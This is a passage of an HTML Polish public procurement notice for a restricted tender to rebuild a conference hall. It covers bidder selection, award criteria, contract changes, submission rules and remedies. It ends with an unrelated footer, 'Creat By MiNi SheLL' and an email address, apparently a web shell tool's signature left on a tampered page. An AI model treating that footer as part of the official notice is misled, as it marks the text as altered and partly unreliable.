3. Podmiot, który zobowiązał się do udostępnienia Wykonawcy zasobów, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br>
Forma dokumentów:<br>
dokumenty, o których mowa w pkt 1, tj.:<br>
- pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - musi być złożone w formie oryginału i podpisane przez osobę, osoby uprawnioną,e do reprezentowania podmiotu użyczającego zasoby. Do wniosku należy załączyć dokument - akt rejestracyjny lub pełnomocnictwo, z którego takie upoważnienie wynika - złożony w formie oryginału lub kopii poświadczonej własnoręcznym podpisem za zgodność z oryginałem z zastrzeżeniem, że jeśli tym dokumentem będzie pełnomocnictwo, to musi być złożone w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.<br>
- inne dokumenty, za pomocą których Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia - muszą być złożone w formie oryginału lub kopii poświadczonej własnoręcznym podpisem i dopiskiem za zgodność z oryginałem.<br>
Kopie dokumentów podmiotu użyczającego zasobów za zgodność z oryginałem może potwierdzić podmiot użyczający zasoby -osoba uprawniona - lub Wykonawca jeżeli posiada stosowne umocowanie do działania -reprezentowania- w imieniu podmiotu użyczającego zasoby. Do wniosku należy dołączyć dokument, z którego takie umocowanie wynika.<br>
4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane jest ustanowienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do wniosku należy załączyć dokument ustanawiający pełnomocnika. Przyjmuje się, że pełnomocnictwo do podpisania wniosku obejmuje również pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii dokumentów załączonych do wniosku.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 8.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p><br>I.Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 8 Zamawiający zaprosi do składania ofert Wykonawców, którzy otrzymają najwyższe oceny spełniania warunków udziału według następujących zasad:<br>
1. Za każde zrealizowane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone zamówienie polegające na remoncie lub budowie lub przebudowie (w rozumieniu ustawy Prawo budowlane) sal/i konferencyjnych/nej lub sali widowiskowej, o wartości każdego zamówienia co najmniej 1 000 000 zł brutto, które obejmowało swym zakresem wykonanie robót budowlanych w zakresie akustyki wewnętrznej - Wykonawca otrzyma 6 punktów. W sumie Wykonawca może otrzymać max. 60 punktów.<br>
Zamawiający oceni maksymalnie 10 robót budowlanych o charakterze opisanym w pkt 2-11 Wykazu robót budowlanych, o którym mowa w pkt III.4.1 tiret 1<br>
UWAGA<br>
- Zamawiający uzna roboty budowlane za wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone wówczas, jeżeli ich prawidłowe wykonanie zostanie potwierdzone przez Wykonawcę w sposób określony w pkt III.3.2 i III.4.1 - Wykaz robót budowlanych  oraz dowody - niniejszego Ogłoszenia.<br>

Uwaga - Zamawiający w ramach kwalifikacji oceniał będzie doświadczenie własne Wykonawcy (tj. zamówienia wykonane siłami własnymi Wykonawcy - jako wykonawca, w tym członek konsorcjum lub jako podwykonawca) a także doświadczenia podmiotu trzeciego, na które powołuje się Wykonawca, z zastrzeżeniem że za każde zamówienie wykonane siłami własnymi Wykonawcy, tj. jako Wykonawca, w tym członek konsorcjum lub jako podwykonawca liczba punktów zostanie przyznana w pełnej wysokości, zgodnie ze wskazaniem w pkt 1, powyżej, natomiast za każde zamówienie wykonane przez podmiot trzeci Wykonawca otrzyma liczbę punktów wskazaną w pkt 1 powyżej, podzieloną przez trzy.<br> 


II. Zamawiający zaprosi do składania ofert 8 Wykonawców, którzy uzyskają największą liczbę punktów.<br>

III. Zamawiający odstąpi od ograniczenia liczby Wykonawców, którzy zostaną zaproszeni do składania ofert w przypadku, gdy liczba Wykonawców, którzy spełniają warunki jest mniejsza lub równa 8.<br> 
W takim przypadku Zamawiający zaprosi do składania ofert wszystkich Wykonawców spełniających warunki udziału w postępowaniu.<br>

IV. W przypadku, gdy po przyznaniu punktów i dokonaniu klasyfikacji Wykonawców więcej niż jeden Wykonawca uzyska taką samą liczbę punktów (na pozycjach od 1 do 8), wówczas o tym, którzy Wykonawcy zostaną zaproszeni do składania ofert, decydować będzie liczba punktów uzyskanych w ramach oceny doświadczenia (zgodnie z pkt I ppkt 1 powyżej) uwzględniając wyłącznie doświadczenie własne Wykonawcy (uzyskane jako Wykonawca, w tym członek konsorcjum i jako podwykonawca), bez uwzględnienia doświadczeń podmiotów trzecich, na które Wykonawca się powołuje na zasadach określonych w art. 26 ust. 2b) ustawy.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br>Zamawiający przewiduje zmiany w zawartej Umowie w stosunku do treści oferty dotyczące przedmiotu niniejszego zamówienia publicznego, wielkości poszczególnych dostaw, sposobu realizacji robót budowlanych lub usług oraz terminu płatności i terminu realizacji Umowy w następujących przypadkach:<br>
1)	uzasadnionych przyczyn technicznych lub funkcjonalnych powodujących konieczność zmiany sposobu wykonania umowy;<br>
2)	konieczności zmiany terminu wykonania lub odbioru usługi/roboty budowlanej spowodowanej podjęciem przez Zamawiającego decyzji o przeprowadzeniu przez osobę trzecią kontroli jakości i sposobu prowadzenia usługi/roboty budowlanej;<br>
3)	z powodu istotnych braków lub błędów w dokumentacji projektowej robót budowlanych, również tych polegających na niezgodności dokumentacji z przepisami prawa;<br>
4)	z powodu działań osób trzecich uniemożliwiających wykonywanie robót budowlanych, które to działania nie są konsekwencją winy którejkolwiek ze stron;<br>
5)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;<br>
6)	z przyczyn organizacyjnych ze strony Zamawiającego, w tym zmian w strukturze organizacyjnej;<br>
7)	z przyczyn wynikających ze specyfiki działalności Zamawiającego;<br>
8)	zaistnienia siły wyższej;<br>
9)	Zmiany techniczne i technologiczne spowodowane w szczególności następującymi okolicznościami:<br>
a)	pojawienie się na rynku materiałów lub urządzeń pozwalających na zaoszczędzenie kosztów realizacji przedmiotu Umowy lub kosztów eksploatacji wykonanego przedmiotu Umowy, lub umożliwiające uzyskanie lepszej jakości robót lub urządzeń,<br>
b)	pojawienie się technologii wykonania zaprojektowanych robót pozwalającej na skrócenie czasu realizacji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu Umowy,<br>
c)	konieczność zrealizowania jakiejkolwiek części robót, objętych przedmiotem niniejszej Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub/i technologicznych, niż wskazane w Opisie przedmiotu zamówienia, a wynikających ze stwierdzonych wad w tym (tych) dokumencie (dokumentach), gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wykonaniem nienależytym przedmiotu Umowy,<br>
10)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.<br>
11)	zmiana obowiązującej stawki VAT,<br>
12)	kolizja z planowanymi lub równolegle prowadzonymi inwestycjami,<br>
13)	w innych przypadkach niezależnych od Zamawiającego i niepozwalających na realizację zgodnie z Umową,<br>
14)	 w przypadku ograniczenia środków finansowych Zamawiającemu,<br>
15)	wystąpienia konieczności wykonania robót dodatkowych, udzielenia przez Zamawiającego zamówienia dodatkowego lub zamówienia uzupełniającego<br>

- w opisanych przypadkach zmianie (w tym ograniczeniu) ulec może odpowiednio zakres rzeczowy przedmiotu zamówienia, cena umowy brutto (oraz jej składniki), termin wykonania przedmiotu zamówienia, termin i sposób płatności, sposób realizacji przedmiotu zamówienia, w tym zmiana materiałów lub technologii wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Specyfikacja istotnych waunków zamówienia nie jest dostepna na stronie internetowej<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana Wykonawcom spełniającym warunki udziału w postępowaniu wraz z zaproszeniem do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2016 godzina 10:00, miejsce: Warszawa, ul. Filtrowa 57, pok. 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> <br>I. Tajemnica przedsiębiorstwa<br>
1. W przypadku umieszczenia przez Wykonawcę we wniosku informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca zobowiązany jest, na podstawie art. 8 ust. 3 ustawy, nie później niż do upływu terminu składania wniosków do:<br>
1) zastrzeżenia, że nie mogą być one udostępniane<br>
oraz<br>
2) wykazania, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.<br>
2. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy.<br>
3. Jeżeli Wykonawca składa wraz z wnioskiem w wersji papierowej informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Zamawiający zaleca umieszczenie ich kopii w wersji elektronicznej, tj. skanu, w osobnym nieedytowalnym pliku PDF na dowolnym nośniku elektronicznym.<br>
4. Informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, które Wykonawca składa wraz z wnioskiem lub przekazuje Zamawiającemu na innej podstawie w toku prowadzonego postępowania, należy złożyć i zabezpieczyć (np. umieścić w osobnej zaklejonej kopercie opatrzonej stosownym opisem) w taki sposób, aby Zamawiający nie miał wątpliwości, że są to informacje zastrzeżone i nie mogą być one udostępniane innym podmiotom.<br>
II. W przypadku, gdy za najkorzystniejszą uznana zostanie oferta złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, pełnomocnik wyznaczony przez tych Wykonawców przedstawi Zamawiającemu, przed zawarciem umowy, oryginał lub kopię, poświadczonej własnoręcznym podpisem i dopiskiem za zgodność z oryginałem przez wyznaczonego przez nich pełnomocnika lub odpowiednio przez tych Wykonawców, umowy regulującej współpracę tych Wykonawców. Umowa ta nie może być umową przedwstępną ani umową zawartą pod warunkiem zawieszającym.<br>
III. Zamawiający zwraca szczególną uwagę na możliwość dokonania wizji lokalnej w miejscu planowanych robót przez Wykonawców zaproszonych do złożenia oferty, przed jej złożeniem.<br>
Wizję lokalną można przeprowadzić od poniedziałku do piątku w godz. 10-14, po uprzednim uzgodnieniu terminu z p. Dariuszem Żakiem, adres e-mail: nik_zp@nik.gov.pl<br>
IV. Przed podpisaniem umowy Wykonawca zobowiązany jest do:<br>
1. wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10% ceny oferty, pod rygorem utraty wadium na podstawie art. 46 ust. 5 pkt 2 ustawy;<br>
2. dostarczenia Zamawiającemu, pod rygorem utraty wadium na podstawie art. 46 ust. 5 pkt 3 ustawy:<br>
a) poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy kopii opłaconej polisy ubezpieczeniowej, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 2 500 000,00 (słownie: dwa miliony pięćset tysięcy) zł na jedno zdarzenie<br>
b) poświadczonych za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy kopii dokumentów potwierdzających:<br>
- wykształcenie wyższe pierwszego stopnia w zakresie inżynierii dźwięku lub akustyki,<br>
- opracowanie co najmniej 2 zrealizowanych projektów akustyki pomieszczeń: sali konferencyjnej lub sali widowiskowej,<br>
- uprawnienia budowlane,<br>
- uprawnienia SEP<br>  oraz dokumentów potwierdzających członkostwo do właściwej terenowo Okręgowej Izby Inżynierów Budownictwa,<br> 
odpowiednio dla osób określonych w pkt. III.3.4.<br>
c) w przypadku powierzenia części zamówienia podwykonawcom - projektu/ów umowy/ów z podwykonawcą/ami/ i z dalszym/i/ podwykonawcą/ami/, dotyczącą/ymi/ powierzonej mu/im/ części zamówienia.<br>
V. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Postanowienia zawarte w  pkt.4.3.1) w zakresie terminu wystawienia dokumentu stosuje się odpowiednio.<br>
VI Opis sposobu przygotowywania wniosku.<br>
1. Wniosek należy przygotować w języku polskim w formie pisemnej, w sposób czytelny i trwały, na druku stanowiącym Załącznik nr 1 do Ogłoszenia. W przypadku sporządzenia wniosku przez Wykonawcę na własnym formularzu wymaga się, żeby Wykonawca uwzględnił w nim wszystkie oświadczenia i elementy zawarte w Załączniku nr 1 do Ogłoszenia.<br>
2. Wniosek powinien być podpisany przez osoby uprawnione do reprezentowania Wykonawcy, zgodnie z właściwym aktem rejestracyjnym lub dołączonym do wniosku pełnomocnictwem. W przypadku reprezentowania Wykonawcy przez inną osobę niż to wynika z zasad reprezentacji takiego podmiotu, należy wraz z pełnomocnictwem wystawionym dla tej osoby, przedstawić pełnomocnictwo, z którego będzie wynikała zgoda na udzielenie dalszych pełnomocnictw.<br>
3. Pełnomocnictwa złożone wraz z wnioskiem muszą być złożone w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.<br>
4. Wniosek należy złożyć w oryginale oraz kopii w wersji elektronicznej, tj. zeskanowany w formacie jednego nieedytowalnego pliku PDF na dowolnym nośniku elektronicznym.<br> 
5. Wniosek należy złożyć w zaklejonej kopercie z podaną nazwą i adresem Wykonawcy, opatrzonej napisem: Wniosek dotyczący kompleksowej przebudowy sali im. L. Kaczyńskiego. Nie otwierać przed upływem terminu otwarcia wniosków.<br>
6. Ewentualne poprawki w tekście wniosku muszą być naniesione w sposób czytelny i parafowane przez osobę/osoby podpisujące wniosek.<br>
7. W przypadku, gdy w treści załączonych przez Wykonawcę do wniosku dokumentów podane zostaną wartości wyrażone w walucie innej niż PLN, wówczas Zamawiający dokona przeliczenia tych wartości na PLN według średniego kursu złotego podanego przez Narodowy Bank Polski na dzień wyznaczony jako dzień składania wniosków.<br>
VII. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku postępowania o udzielenie zamówienia.<br>
1. Środki ochrony prawnej, określone w Dziale VI ustawy przysługują Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes prawny w uzyskaniu niniejszego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy.<br>
2. Odwołanie do Krajowej Izby Odwoławczej - zwanej dalej KIO, przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności Zamawiającego podjętej w niniejszym postępowaniu o udzielenie zamówienia lub zaniechania czynności, do której Zamawiający jest zobowiązany na podstawie ustawy, tj.:<br>
2.1 opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,<br>
2.2 wykluczenia odwołującego z postępowania o udzielenie zamówienia.<br>
3. Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne uzasadniające wniesienie odwołania.<br>
4. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej w formie pisemnej albo elektronicznej opatrzonej bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.<br>
5. Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu do jego wniesienia, jeżeli przesłanie jego kopii nastąpiło przed upływem terminu do jego wniesienia za pomocą jednego ze sposobów określonych w art. 27 ust. 2. ustawy.<br>
6. Odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2 ustawy, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.<br>
7 Odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych.<br>
8 Odwołanie wobec czynności innych niż określone w pkt 6 i 7 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.<br>
9. Na orzeczenie Krajowej Izby Odwoławczej stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu okręgowego właściwego dla siedziby albo miejsca zamieszkania Zamawiającego. Skargę wnosi się za pośrednictwem Prezesa KIO w terminie 7 dni od dnia doręczenia orzeczenia KIO, przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej operatora publicznego jest równoznaczne z jej wniesieniem.<br>
VIII. Załączniki do niniejszego ogłoszenia dostępne pod adresem http://bip.nik.gov.pl/zamowienia-publiczne/.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com